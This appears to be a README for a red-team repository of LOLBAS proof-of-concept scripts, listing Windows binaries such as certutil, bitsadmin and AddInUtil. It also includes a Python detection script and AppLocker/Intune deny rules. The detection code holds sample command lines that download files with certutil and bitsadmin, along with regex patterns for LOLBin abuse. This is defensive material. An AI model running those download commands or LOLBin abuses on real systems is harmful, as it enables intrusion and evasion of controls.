This repo showcases practical PoCs that use LOLBAS techniques (living-off-the-land binaries and scripts) to execute commands without dropping malware. Whether you're a red teamer, researcher, or just here for the chaos, you'll find "weaponized" LOL moments: harmless-looking, Microsoft-signed binaries doing suspiciously powerful things.
💻 Built for demos.
🎩 Powered by misused trust.
🔍 Monitored by defenders (hopefully).
💣 Triggered by AddInUtil, msbuild, certutil, and friends.
AddInUtil: .NET tool used for updating cache files for Microsoft Office Add-Ins.
`python3 AddinUtil.py`
- https://github.com/pwntester/ysoserial.net
- https://lolbas-project.github.io/lolbas/Binaries/Addinutil/

Aspnet_Compiler: ASP.NET compilation tool.
`python3 Aspnet_Compiler.py`

AppInstaller: Tool used for installation of AppX/MSIX applications on Windows 10.
`python3 AppInstaller.py`
- https://learn.microsoft.com/en-us/windows-hardware/get-started/adk-install
- https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

Schtasks: Schedules periodic tasks.
`python3 Schtasks.py`

Atbroker: Assistive Technology (AT) broker. Administrative privileges required.
`python3 Atbroker.py`

Bitsadmin: Used for managing Background Intelligent Transfer Service (BITS) jobs.
`python3 Bitsadmin.py`

CertOC: Used for installing certificates; included in Windows Server.
`python3 CertOC.py`

Certutil: Windows binary used for handling certificates. Administrative privileges required.
`python3 Certutil.py`

Fodhelper: Manages optional features in Windows.
`python3 Fodhelper.py`

Control: Binary used to launch Control Panel items in Windows.
`python3 Control.py`

Csc: Binary used by the .NET Framework to compile C# code.
`python3 Csc.py`

Advpack: Utility for installing software and drivers with rundll32.exe.
`python Advpack.py`

Forfiles: Selects and executes a command on a file or set of files; useful for batch processing.
`python Forfiles.py`

Ftp: A binary designed for connecting to FTP servers.
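The defender's side of the binaries above, as an added example that is not part of this repo: a small triage pass over constructed Sysmon Event ID 1-style process-creation records (the `Image`, `CommandLine` and `ParentImage` fields). The command-line patterns are taken from the LOLBAS entries for each binary and are a starting point for detection logic, not a complete signature set; the sample events are made up for the example.

```python
"""Triage process-creation events for the LOLBins listed above.

Added example, not part of this repo. The events are constructed Sysmon
Event ID 1-style records; the argument patterns come from the LOLBAS entries
for each binary and are a starting point, not a complete signature set.
"""
import re

WINDOWS_DIR = "c:\\windows\\"

# (binary, regex over CommandLine, reason). Fodhelper is deliberately absent:
# its UAC bypass has no telling command line and is caught by watching the
# HKCU\Software\Classes\ms-settings\shell\open\command key instead.
RULES = [
    ("certutil.exe", r"-urlcache\b.*-(split|f)\b|-decode\b", "file download or base64 decode"),
    ("certoc.exe", r"-loaddll\b", "DLL loaded through certoc"),
    ("bitsadmin.exe", r"/(transfer|addfile|setnotifycmdline)\b", "BITS download or job-completion command"),
    ("addinutil.exe", r"-addinroot:", "add-in cache deserialization from a custom root"),
    ("aspnet_compiler.exe", r"-p\s", "precompilation of an attacker-controlled web root"),
    ("appinstaller.exe", r"ms-appinstaller://", "package fetched via the ms-appinstaller handler"),
    ("csc.exe", r"[-/](out|target):", "ad-hoc C# compilation"),
    ("forfiles.exe", r"/c\s+\S", "command executed per matched file"),
    ("ftp.exe", r"-s:", "scripted ftp session"),
    ("schtasks.exe", r"/create\b.*/tr\b", "scheduled task created with an action"),
    ("atbroker.exe", r"/start\b", "Assistive Technology launched by registered name"),
    ("control.exe", r"\.cpl\b|\\[^\\\s]+:[^\\\s:]+", "Control Panel item or ADS payload"),
    ("rundll32.exe", r"advpack\.dll,\s*(launchinfsection|registerocx)", "advpack INF/OCX execution"),
]
KNOWN_LOLBINS = {name for name, _, _ in RULES}


def triage(events):
    """Return one (binary, reason, command_line) tuple per suspicious event."""
    findings = []
    for ev in events:
        image = ev["Image"].lower()
        binary = image.rsplit("\\", 1)[-1]
        cmd = ev["CommandLine"]
        for name, pattern, reason in RULES:
            if binary == name and re.search(pattern, cmd, re.IGNORECASE):
                findings.append((name, reason, cmd))
        # A known LOLBin running from outside the Windows directory is usually a
        # copied or renamed binary, the standard way to dodge AppLocker path rules.
        if binary in KNOWN_LOLBINS and not image.startswith(WINDOWS_DIR):
            findings.append((binary, "LOLBin executed from outside %WINDIR%", cmd))
    return findings


# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://10.0.0.5/a.txt C:\Users\Public\a.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",  # benign use
     "CommandLine": r"certutil.exe -dump C:\Temp\cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://10.0.0.5/b.exe C:\Users\Public\b.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe",
     "CommandLine": r"AddInUtil.exe -AddInRoot:C:\Users\Public\addins -PipelineRoot:C:\Users\Public\pipeline",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",  # benign use
     "CommandLine": r"schtasks /query /fo LIST",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\certutil.exe",  # copied LOLBin, benign-looking args
     "CommandLine": r"certutil.exe -dump C:\Temp\cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for name, reason, cmd in triage(SAMPLE_EVENTS):
        print(f"[{name}] {reason}: {cmd}")
```

Running it flags the certutil download, the BITS transfer, the AddInUtil custom root and the copy of certutil.exe under C:\Users\Public, while the two benign invocations pass. In a real pipeline the same rules would run over Sysmon or Security 4688 events with command-line logging enabled.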
`python Ftp.py`

Blocking the binaries with an Intune custom OMA-URI policy (AppLocker CSP):
- Microsoft Intune admin center -> Devices -> Configuration -> New Policy
- Assignment: Devices only, NOT users.
- Platform: Windows 10 and later
- Policy Type: Custom
- Add OMA-URI Settings rule
- Data type: String; the value is the RuleCollection XML below
OMA-URI
- The {GROUPING} segment can be any string value, so you can create and name custom groups as needed.
- `./Vendor/MSFT/AppLocker/ApplicationLaunchRestrictions/{GROUPING}/EXE/Policy`
Basic XML String Value sample
- The following XML rules are a basic ruleset; review and extend them to meet your organizational requirements before applying them to your Intune OMA-URI policy.
```xml
<RuleCollection Type="Exe" EnforcementMode="NotConfigured">
  <FilePathRule Id="{GUID}" Name="(Default Rule) All files located in the Program Files folder" Description="Allows members of the Everyone group to run applications that are located in the Program Files folder." UserOrGroupSid="S-1-1-0" Action="Allow">
    <Conditions>
      <FilePathCondition Path="%PROGRAMFILES%\*" />
    </Conditions>
  </FilePathRule>
  <FilePathRule Id="{GUID}" Name="(Default Rule) All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
    <Conditions>
      <FilePathCondition Path="%WINDIR%\*" />
    </Conditions>
  </FilePathRule>
  <FilePathRule Id="{GUID}" Name="(Default Rule) All files" Description="Allows members of the local Administrators group to run all applications." UserOrGroupSid="S-1-5-32-544" Action="Allow">
    <Conditions>
      <FilePathCondition Path="*" />
    </Conditions>
  </FilePathRule>
  <FilePublisherRule Id="{GUID}" Name="ADDINUTIL.EXE, in MICROSOFT® .NET FRAMEWORK, from O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
    <Conditions>
      <FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="MICROSOFT® .NET FRAMEWORK" BinaryName="ADDINUTIL.EXE">
        <BinaryVersionRange LowSection="*" HighSection="*" />
      </FilePublisherCondition>
    </Conditions>
  </FilePublisherRule>
</RuleCollection>
```

Before deploying, check the following:
- Replace every `{GUID}` with its own unique GUID; each rule needs a distinct Id.
- The sample carries `EnforcementMode="NotConfigured"`. Set it to `AuditOnly` first and watch for AppLocker event 8003 (would have been blocked), then switch to `Enabled` to actually block (event 8004).
- Keep the three default allow rules: once the Exe collection contains any rule, AppLocker blocks everything that is not explicitly allowed.
- An explicit Deny always wins over Allow, so the ADDINUTIL.EXE rule also applies to local Administrators despite the "All files" allow rule.
- The publisher condition keys on the Authenticode signature, so a renamed or copied AddInUtil.exe is still denied; a path-based deny would not catch that.

Create your AppLocker policy on a lab machine via secpol.msc or GPO, export it to XML, and deploy it:
- Windows Key + R
- secpol.msc
- Application Control Policies -> AppLocker -> Executable Rules -> Create new Rule
- Permissions Action: Deny
- Conditions: Publisher
- Right click on AppLocker -> Export Policy
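The XML sample and the Intune OMA-URI procedure above can be put together in code. The following script is an added example, not part of this repo: it generates the Exe RuleCollection string for the OMA-URI value with the three default allow rules, one publisher deny rule per LOLBin, a fresh GUID for every rule and a chosen enforcement mode, then runs the pre-deployment checks listed above. The ADDINUTIL.EXE product name is the one shown on this page; the CERTUTIL.EXE product name in the sample deny list is an assumption and must be confirmed against the real binary (for example with `Get-AppLockerFileInformation`) before use.

```python
"""Build the AppLocker EXE RuleCollection string for the OMA-URI above.

Added example, not part of this repo: generates the default allow rules plus
one publisher deny rule per LOLBin with a fresh GUID per rule, and checks the
result before it is pasted into Intune.
"""
import uuid
import xml.etree.ElementTree as ET

EVERYONE = "S-1-1-0"
LOCAL_ADMINS = "S-1-5-32-544"
MS_PUBLISHER = "O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"

# Signed identities for the deny list. ADDINUTIL.EXE is the pair shown on this
# page; the CERTUTIL.EXE product name is an assumption, verify it against the
# real binary before deploying.
DENY_LIST = [
    ("ADDINUTIL.EXE", "MICROSOFT® .NET FRAMEWORK"),
    ("CERTUTIL.EXE", "MICROSOFT® WINDOWS® OPERATING SYSTEM"),
]


def _new_id():
    return str(uuid.uuid4())  # exported AppLocker policies use brace-less GUIDs


def _allow_path(parent, name, description, sid, path):
    rule = ET.SubElement(parent, "FilePathRule", Id=_new_id(), Name=name,
                         Description=description, UserOrGroupSid=sid, Action="Allow")
    ET.SubElement(ET.SubElement(rule, "Conditions"), "FilePathCondition", Path=path)


def _deny_publisher(parent, binary, product, sid=EVERYONE):
    rule = ET.SubElement(parent, "FilePublisherRule", Id=_new_id(),
                         Name=f"{binary}, in {product}, from {MS_PUBLISHER}",
                         Description="", UserOrGroupSid=sid, Action="Deny")
    cond = ET.SubElement(ET.SubElement(rule, "Conditions"), "FilePublisherCondition",
                         PublisherName=MS_PUBLISHER, ProductName=product, BinaryName=binary)
    ET.SubElement(cond, "BinaryVersionRange", LowSection="*", HighSection="*")


def build_exe_policy(deny_list=DENY_LIST, enforcement="AuditOnly"):
    """Return the RuleCollection XML as one string (the OMA-URI String value)."""
    if enforcement not in ("AuditOnly", "Enabled", "NotConfigured"):
        raise ValueError(f"unknown EnforcementMode: {enforcement}")
    root = ET.Element("RuleCollection", Type="Exe", EnforcementMode=enforcement)
    # The default allow rules must stay: once the Exe collection has any rule,
    # AppLocker blocks everything that is not explicitly allowed.
    _allow_path(root, "(Default Rule) All files located in the Program Files folder",
                "Allows members of the Everyone group to run applications that are located in the Program Files folder.",
                EVERYONE, r"%PROGRAMFILES%\*")
    _allow_path(root, "(Default Rule) All files located in the Windows folder",
                "Allows members of the Everyone group to run applications that are located in the Windows folder.",
                EVERYONE, r"%WINDIR%\*")
    _allow_path(root, "(Default Rule) All files",
                "Allows members of the local Administrators group to run all applications.",
                LOCAL_ADMINS, "*")
    for binary, product in deny_list:
        _deny_publisher(root, binary, product)  # Deny beats Allow, admins included
    return ET.tostring(root, encoding="unicode")


def check_policy(xml_text):
    """Pre-deployment checks: parses, unique Ids, no placeholders, enforcement set."""
    root = ET.fromstring(xml_text)
    ids = [rule.get("Id") for rule in root]
    denied = [rule.find("Conditions/FilePublisherCondition").get("BinaryName")
              for rule in root if rule.get("Action") == "Deny"]
    return {
        "enforcement": root.get("EnforcementMode"),
        "enforcement_set": root.get("EnforcementMode") != "NotConfigured",
        "unique_ids": len(ids) == len(set(ids)),
        "no_placeholders": "{GUID}" not in xml_text,
        "allow_rules": sum(1 for rule in root if rule.get("Action") == "Allow"),
        "denied": denied,
    }


if __name__ == "__main__":
    policy = build_exe_policy(enforcement="Enabled")
    print(check_policy(policy))
    print(policy)
```

The printed string is what goes into the OMA-URI value; run with `enforcement="AuditOnly"` for the first rollout and switch to `Enabled` once the 8003 events look right.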
- https://lolbas-project.github.io/
- https://intune.microsoft.com/
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
- https://learn.microsoft.com/en-us/windows/client-management/mdm/applocker-csp
- https://learn.microsoft.com/en-us/windows/client-management/mdm/applocker-csp#applicationlaunchrestrictionsgroupingexepolicy
- https://learn.microsoft.com/en-us/troubleshoot/mem/intune/device-configuration/deploy-oma-uris-to-target-csp-via-intune
- https://github.com/hfiref0x/UACME